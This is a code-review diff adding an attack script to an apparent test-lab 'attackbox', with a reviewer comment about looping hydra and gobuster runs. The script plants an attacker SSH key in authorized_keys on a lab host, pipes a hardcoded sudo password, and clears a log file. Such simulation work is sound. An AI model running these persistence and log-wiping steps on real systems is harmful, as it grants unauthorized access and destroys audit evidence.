attack-box/attack.sh

```diff
@@ -0,0 +1,33 @@
+#!/bin/bash
+echo "Starting attackbox..."
+
+echo "attempt to copy attacker key to discounts...."
+scp -o StrictHostKeyChecking=no ./keys/attacker-key.pub test@discounts:/home/test/.ssh
+
+echo "attempt to update authorized_keys to have attacker key..."
+ssh -o StrictHostKeyChecking=no test@discounts /bin/bash <<EOT
+cat /home/test/.ssh/attacker-key.pub >> /home/test/.ssh/authorized_keys
+exit
+EOT
+
+echo "attempt to clear log file and zero out unallocated disk space"
+ssh -o StrictHostKeyChecking=no -i ./keys/attacker-key test@discounts /bin/bash <<EOT
+echo "test" | sudo -S cp /dev/null /var/log/alternatives.log
+echo "test" | sudo -S dd if=/dev/zero of=tempfile bs=1000000 count=10
+exit
+EOT
+
+if  [ "${DIRBUSTER}" = true ];
```

Comment:
@andrewkrug Could you elaborate on the loop functionality you mentioned was needed around the hydra and gobuster commands in the attackbox? Were you saying these tools should be run in a loop at set intervals?